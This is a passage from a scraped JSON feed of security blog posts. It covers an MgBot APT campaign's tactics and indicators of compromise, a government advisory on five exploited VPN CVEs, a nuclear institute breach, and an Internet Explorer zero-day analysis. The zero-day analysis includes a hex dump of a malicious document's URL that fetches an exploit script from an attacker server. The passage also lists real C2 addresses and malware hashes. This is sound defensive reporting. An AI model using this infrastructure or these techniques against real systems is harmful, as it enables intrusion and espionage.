injection](<https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign>) in its previous campaigns. \n\nConsidering these factors we attribute this APT attack with moderate confidence to a new Chinese APT group. Based on the TTPs used by this APT group we were able to track back its activities to at least 2014. In all their campaigns the actor has used a variant of MgBot.\n\n### A threat actor with a long documented history\n\nA [Needle in a haystack](<https://www.virusbulletin.com/virusbulletin/2014/02/needle-haystack>) blog post from 2014 detailed a campaign that drops a Trojan disguised as a legitimate MP3 encoder library. In this campaign the actor used [CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) to drop its Trojan. The rest of the TTPs including the methods used by the threat actor to execute MgBot and registry modifications are similar to this ongoing campaign. \n\nIn 2018, this group performed another operation in which they used a VBScript vulnerability ([CVE-2018-8174)](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>) to [initiate their attack ](<http://771a8f83a0c6f08b2060d86fcbd40d36ee3a681beadb32ff6f288e2648c64bf9>)to drop a variants of MgBot. In March 2020, an archive file ([warning.rar](<http://bc85b5b1e69728b01e64266506904eacd6bbc1bf60a5e631cb35327e494f9815>)) was submitted to VirusTotal that we believe is part of another campaign used by this actor.\n\nWe will continue this group&#x27;s activities to see if their targeting or techniques evolve. Malwarebytes users are protected from this campaign thanks to our signature-less anti-exploit layer.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/nebula_.png> \"\" )Figure 29: Malwarebytes Nebula blocking malicious Word document\n\n### MITRE ATT&amp;CK techniques\n\n**Tactic**| **ID**| **Name**| **Details** \n---|---|---|--- \nExecution| [T1059](<https://attack.mitre.org/techniques/T1059>)| Command-Line Interface| Starts CMD.EXE for commands execution \n\ufeff| [T1106](<https://attack.mitre.org/techniques/T1106>)| Execution through Module Load| Loads dropped or rewritten executable \n- WUAUCTL.EXE \n- svchost.exe \n- rundll32.exe \n\ufeff| [T1053](<https://attack.mitre.org/techniques/T1053>)| Rundll32| Uses RUNDLL32.EXE to load library \n\ufeff| [T1064](<https://attack.mitre.org/techniques/T1064>)| Scripting| WScript.exe: Starts MSHTA.EXE for opening HTA or HTMLS files \n\ufeff| [](<https://attack.mitre.org/techniques/T1204>)[T1035](<https://attack.mitre.org/techniques/T1035>)| service execution| Starts NET.EXE for service management \n| [T1170 ](<https://attack.mitre.org/techniques/T1170>)| mshta| Starts MSHTA.EXE for opening HTA or HTMLS files \n| [T1086](<https://attack.mitre.org/techniques/T1086>)| PowerShell| Executes PowerShell scripts \nPrivilege Escalation| [T1050](<https://attack.mitre.org/techniques/T1050>)| new service| Creates or modifies windows services through rundll32.exe \n\ufeff| [T1088](<https://attack.mitre.org/techniques/T1088>)| Bypass UAC| Known privilege escalation attack through DllHost.exe \nPersistence| [T1031](<https://attack.mitre.org/techniques/T1031>)| Modify Existing Service| Creates or modifies windows services through rundll32.exe \n| [T1050](<https://attack.mitre.org/techniques/T1050>)| new services| Creates or modifies windows services through rundll32.exe \nDefense Evasion| [](<https://attack.mitre.org/techniques/T1107>)[T1107](<https://attack.mitre.org/techniques/T1107>)| File Deletion| Starts CMD.EXE for self-deleting \n\ufeff| [T1085 ](<https://attack.mitre.org/techniques/T1085>)| Rundll32| Uses RUNDLL32.EXE to load library \n| [T1088](<https://attack.mitre.org/techniques/T1088>)| bypass UAC| Known privilege escalation attack through DllHost.exe \n| [T1497](<https://attack.mitre.org/techniques/T1497/>)| Virtualization/Sandbox Evasion| The Loader uses several anti-virtualization detections techniques \n| [T1221](<https://attack.mitre.org/techniques/T1221/>)| Template Injection| Maldoc uses template injection to download remote template \n| [T1218](<https://attack.mitre.org/techniques/T1218/>)| Signed Binary Proxy Execution| Use Squiblydoo to load executable \nDiscovery| [T1012](<https://attack.mitre.org/techniques/T1012>)| Query Registry| Reads the machine GUID from the registry \n| [T1082](<https://attack.mitre.org/techniques/T1082>)| System Information Discovery| Reads the machine GUID from the registry \n| [T1007](<https://attack.mitre.org/techniques/T1007>)| System Service Discovery| Starts NET.EXE for service management \nLateral Movement| [T1105](<https://attack.mitre.org/techniques/T1105>)| Remote File Copy| - certutil.exe: Downloads executable files from the Internet \n- cmd.exe: Starts CertUtil for downloading files \nC&amp;C | [T1105](<https://attack.mitre.org/techniques/T1105>)| Remote File Copy| - certutil.exe: Downloads executable files from the Internet \n - cmd.exe: Starts CertUtil for downloading files \nTable 1: Mitre Attack TTPs\n\n### IOCs\n\n**2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a** Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.docx\n\n**fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc** BNOHK.docx.zip\n\n**3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790** Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar\n\n**ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03** Email security check.rar\n\n**1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6** Email security check.docx\n\n**3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b** ADIN.docx (storm.sct)\n\n**855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8** ADIN.docx (storm.sct)\n\n**1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585** ff.exe (storm.txt)\n\n**99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a** cobalt strike\n\n**flash.governmentmm.com**: This domain used by actor to host remote templates. It has been registered 3 month ago by someone in United States.\n\n**MgBot samples**\n\n2310f3d779acdb4881b5014f4e57dd65b4d6638fd011ac73e90df729b58ae1e0 \ne224d730e66931069d6760f2cac97ab0f62d1ed4ddec8b58783237d3dcd59468 \n5b0c93a70032d80c1f5f61e586edde6360ad07b697021a83ed75481385f9f51f \n1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585 \n07bb016c3fde6b777be4b43f293cacde2d3aae0d4e4caa15e7c66835e506964f \n7bdfabdf9a96b3d941f90ec124836084827f6ef06fadf0dce1ae35c2361f1ac6 \n8ab344a1901d8129d99681ce33a76f7c64fd95c314ac7459c4b1527c3d968bb4 \nf41bfc57c2681d94bf102f39d4af022beddafb4d49a49d7d7c1901d14eb698d2\n\n**45.77.245[.]0: **This IP has been used by Cobalt Strike as a C&amp;C server. \n\n**42.99.116[.]225**: C&amp;C server used by final Payload.\n\n**Android samples**\n\nb5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77 \n9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846 \n5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46\n\nThe post [Chinese APT group targets India and Hong Kong using new variant of MgBot malware](<https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {}, "published": "2020-07-21T15:00:00", "type": "malwarebytes", "title": "Chinese APT group targets India and Hong Kong using new variant of MgBot malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2018-8174"], "modified": "2020-07-21T15:00:00", "id": "MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "href": "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T16:30:59", "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisories&#x27; executive summary reads:\n\n> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. This targeting and exploitation encompasses US and allied networks, including national security and government related systems.\n\n### Remarkable mentions in the cybersecurity advisory\n\nReleased alongside the advisory is the US Government\u2019s formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.\n\nMentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.\n\n### Vulnerabilities\n\nNSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe advisory lists the following CVEs:\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n\nWe have added a link to the vendor\u2019s sites where they discuss the vulnerabilities and where you can find how to patch them. As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in device configurations.\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.\n * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.\n * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach\u2019s full scope before remediating.\n\n### Techniques\n\nThe techniques leveraged by SVR actors include:\n\n * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.\n * **Leveraging external remote services**. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RPD) allow users to connect to internal enterprise network resources from external locations.\n * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.\n * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.\n * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n\nThe items listed under mitigations and techniques probably won&#x27;t be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.\n\nStay safe, everyone!\n\nThe post [Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-16T14:59:38", "type": "malwarebytes", "title": "Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T14:59:38", "id": "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-06-21T14:31:54", "description": "Remember when we told you to patch your VPNs already? I hate to say &quot;I told you so&quot;, but I informed you thusly.\n\nAccording to South Korean officials a North Korean cyber-espionage group managed to infiltrate the network of South Korea&#x27;s state-run nuclear research institute last month.\n\n### The crime: time and place\n\nCybersecurity news hounds The Record report that a spokesperson for the Korea Atomic Energy Research Institute (KAERI) said [the intrusion took place last month](<https://therecord.media/north-korean-hackers-breach-south-koreas-atomic-research-agency-through-vpn-bug/>), on May 14 to be exact, through a vulnerability in a virtual private network (VPN) server. Since its establishment in 1959, KAERI has been the only research institute in Korea dedicated to nuclear energy. Reportedly, thirteen unauthorized IP addresses accessed KAERI\u2019s internal network.\n\n### The suspect: Kimsuky\n\nSome of the addresses could be traced back to the APT group called Kimsuky. One of the IP addresses was used in an attack that targeted COVID-19 vaccine developers in South Korea last year.\n\nNorth Korean cyber-attacks on its southern neighbor are not uncommon. And Kimsuky is the APT that is best known for these attacks. The Kimsuky APT is a North Korean threat actor that has been active since 2012 and targets government entities mainly in South Korea. Recently, we reported about [this group using the AppleSeed backdoor](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) against the Ministry of Foreign Affairs of South Korea.\n\n### The victim: KAERI\n\nKAERI is a national research institute which was instrumental in developing nuclear technology for power generation and industrial applications. And while North Korea is ahead of South Korea in some nuclear fields\u2014notably nuclear weapons\u2014it is thought to be weaker than its neighbor when it comes to energy generation. As we stated in our earlier [report](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) one of the other targets was the nuclear security officer for the International Atomic Energy Agency (IAEA), a UN organization tasked with nuclear regulations and cooperation.\n\n### The weapon: a VPN vulnerability\n\nIn a [statement](<https://translate.google.com/translate?sl=auto&tl=en&u=https://www.kaeri.re.kr/board/view?menuId%3DMENU00326%26linkId%3D9181>), KAERI says that an unidentified outsider accessed parts of its system using weaknesses in its virtual private network (VPN). It also states that the attackers&#x27; IP addresses was blocked, and its system upgraded, when it found out about the attack, on May 31. \n\nThe name of the VPN vendor is being kept secret. Although we can&#x27;t rule out a zero-day, that fact that this wasn&#x27;t mentioned, and that the system was updated in response, suggests it wasn&#x27;t. It certainly doesn&#x27;t need to be, and there are a lot of known vulnerabilities in the running. Many of them are years old, and many are known to be used in the wild. Even though patches are available, the application of these patches has taken some organizations quite some time. \n\nWe also wrote recently about vulnerabilities in the [Pulse Secure VPN](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>). Pulse issued a final patch on May 3 for a set of vulnerabilities that were used in the wild.\n\nThe NSA also issued an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) in April about five publicly known vulnerabilities being exploited by the Russian Foreign Intelligence Service (SVR). The CVE numbers used to identify vulnerabilities start with year the CVE was issued. What&#x27;s most striking about the NSA&#x27;s list is just how old most of the vulnerabilities on it are.\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) Fortinet FortiGate VPN\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) Synacor Zimbra Collaboration Suite\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) Pulse Secure Pulse Connect Secure VPN\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) Citrix Application Delivery Controller and Gateway\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) VMware Workspace ONE Access\n\nAs you can see, most of them are VPNs and other networking-related applications. By design a VPN is remotely accessible, which makes it a target that attackers can reach from anywhere. A VPN or gateway is always a likely target, especially if it has a known vulnerability. And a seasoned APT group, like Kimsuky, will have fewer problems reverse-engineering patches than your everyday cybercriminal.\n\n### Patching or lack thereof\n\nThe risky strategy of little-to-no-patching stands a good chance of going horribly wrong. A [Forbes study](<https://www.forbes.com/sites/taylorarmerding/2019/06/06/report-if-you-dont-patch-you-will-pay>) of 340 security professionals in 2019 found 27% of organizations worldwide, and 34% in Europe, said they\u2019d experienced breaches due to unpatched vulnerabilities. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nStay safe, everyone!\n\nThe post [Atomic research institute breached via VPN vulnerability](<https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-21T13:53:03", "type": "malwarebytes", "title": "Atomic research institute breached via VPN vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-21T13:53:03", "id": "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "href": "https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-05-25T17:25:19", "description": "**Update (2018-05-25)**: CVE-2018-8174 has been added to the RIG exploit kit ([MDNC](<https://malware.dontneedcoffee.com/2018/05/CVE-2018-8174.html>)).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/RIG_MBAE_.png> \"\" )\n\n**Update (2018-05-22)**: Security researcher [Richard Warren](<https://twitter.com/buffaloverflow>) [mentioned](<https://twitter.com/buffaloverflow/status/998604384937369601?s=11>) that a fully working IE zero-day (now patched) with payload was [uploaded to VirusTotal](<https://www.virustotal.com/#/file/86b2dec818edaca2b1794c9b3aed19139437fb007c0784bbc04822bca5ea1d39/details>). We decided to test Malwarebytes against it, since last time we only had a Proof of Concept on our hands. To illustrate in how many different ways we can block this exploit, we turned off several layers of the anti-exploit protection module (not recommended, only for testing purposes). You can see the results in the animation below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/CVE-2018-8174_IE_MBAE.gif> \"\" )\n\n--\n\nIn late April, two security companies ([Qihoo360](<http://blogs.360.cn/blog/cve-2018-8174-en/>) and [Kaspersky](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>)) independently discovered a zero-day for Internet Explorer ([CVE-2018-8174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>)), which was used in targeted attacks for espionage purposes. This marks two years since a zero-day has been found ([CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>) being the latest one) in the browser that won't die, despite efforts from Microsoft to move on to the more modern Edge.\n\nThe vulnerability exists in the VBScript engine and how it handles memory objects. It will also affect IE11, even though VBScript is [no longer supported](<https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/dn384057\\(v=vs.85\\)>) by using the compatibility tag for IE10.\n\nThe attack came via a Word document making use of [OLE autolink objects](<https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/>) to retrieve the exploit and shellcode from a remote server. However, it is important to note that it could very well have been executed by visiting a website instead.\n\nPerhaps one of the reasons why it was not used as a drive-by download attack may be because Internet Explorer is no longer the default browser for most people, and therefore the exploitation would never occur. However, by tricking their victims to open an Office document, the attackers can force Internet Explorer to load, thanks in part to the [URL moniker](<https://www.kb.cert.org/vuls/id/921560>) \"feature.\"\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/doc.png> \"\" )\n\nUsing [rtfdump.py](<https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py>), we see the call for an HTTP connection:\n\n_**python rtfdump.py -s 320 -H CVE-2018-8174.rtf**_\n \n \n 000014C0: 70 B2 86 8C 53 30 05 43 00 38 30 01 18 68 00 74 p\ufffd\ufffd\ufffdS0.C.80..h.t\n 000014D0: 00 74 00 70 00 3A 00 2F 00 2F 00 61 00 75 00 74 .t.p.:././.a.u.t\n 000014E0: 00 6F 00 73 00 6F 00 75 00 6E 00 64 00 63 00 68 .o.s.o.u.n.d.c.h\n 000014F0: 00 65 00 63 00 6B 00 65 00 72 00 73 00 2E 00 63 .e.c.k.e.r.s...c\n 00001500: 00 6F 00 6D 00 2F 00 73 00 32 00 2F 00 73 00 65 .o.m./.s.2./.s.e\n 00001510: 00 61 00 72 00 63 00 68 00 2E 00 70 00 68 00 70 .a.r.c.h...p.h.p\n 00001520: 00 3F 00 77 00 68 00 6F 00 3D 00 37 00 00 00 00 .?.w.h.o.=.7....\n\nThis remote request will download a VBS script. A [Proof of Concept adapted](<https://pastebin.com/Be3xFBBn>) from the [blog](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) that was published by Kaspersky can be seen below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/exploit_code.png> \"\" )\n\nThe flaw abused by this vulnerability relates to a reference count that is checked at the beginning of the function but not after, despite the chance of it being incremented along the way. This allows an attacker to execute malicious shellcode and eventually load the malware binary of his choice.\n\nWe tested this Use After Free (UAF) vulnerability with the publicly available PoC running Internet Explorer 11 under Windows 10. The browser crashes once it loads the VBS code, but with [Malwarebytes](<https://www.malwarebytes.com/>), the attack vector is mitigated:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/CVE-2018-8174_Win10.gif> \"\" )\n\nMicrosoft has released a [patch](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174>) for this vulnerability, and we strongly advise to apply it, as it is just a matter of time before other threat actors start leveraging this new opportunity in spam or exploit kit campaigns.\n\nWe will update this blog if we obtain more information about this vulnerability being used widely, and in particular, if a full working exploit is available.\n\nThe post [Internet Explorer zero-day: browser is once again under attack](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:58:00", "type": "malwarebytes", "title": "Internet Explorer zero-day: browser is once again under attack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189", "CVE-2017-0199", "CVE-2018-8174"], "modified": "2018-05-10T19:58:00", "id": "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2018-08-01T08:55:14", "description": "### Introduction\n\n \nDespite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors \u2014 both for widespread and targeted operations. \n \nRecently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. The attacks have become more sophisticated, and have evolved to evade detection on a continual basis. \n \n \nOther researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the [arrest of its alleged leader](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) in Spain this year. \n \nSimple campaigns typically use a single technique and often embed the final executable payload into the exploit document. However, more complex campaigns require meticulous planning on the part of the attacker and include more sophisticated techniques to hide the presence of the malicious code, evade operating system protection mechanisms and eventually deliver the final payload, likely to be present only in the memory of the infected computer and not as a file on the disk. \n \nThe attacks we will be highlighting generally start with an email campaign, often targeted toward financial institutions. The malicious emails display a strong command of the English language, and their content may have been taken from legitimate emails relevant to the business of the targeted organization. \n \nThe emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright. They are using Word OLE compound documents with malicious obfuscated VBA macro code, RTF documents containing Microsoft Office exploits or PDF documents that start the next attack stages to eventually deliver a Cobalt Strike beacon binary or a JScript-based backdoor payload. \n \nIt is essential to be aware of these attacks as emails look legitimate, but can result in the installation of a payload that can inflict significant financial damage to the targeted organization. \n \n\n\n### Infection vector \u2014 Emails\n\n \nAll observed attacks start with an email message, containing either a malicious attachment or a URL which leads to the first stage of the attack. \n \nThe text of the emails is likely taken from legitimate email, such as mailing lists that targeted organisations may be subscribed to. \n \nBelow are three examples, with the first one purporting to be sent by the European Banking Federation and is using a newly registered domain for the spoofed sender email address. The attachment is a malicious PDF file that entices the user to click on a URL to download and open a weaponized RTF file containing exploits for 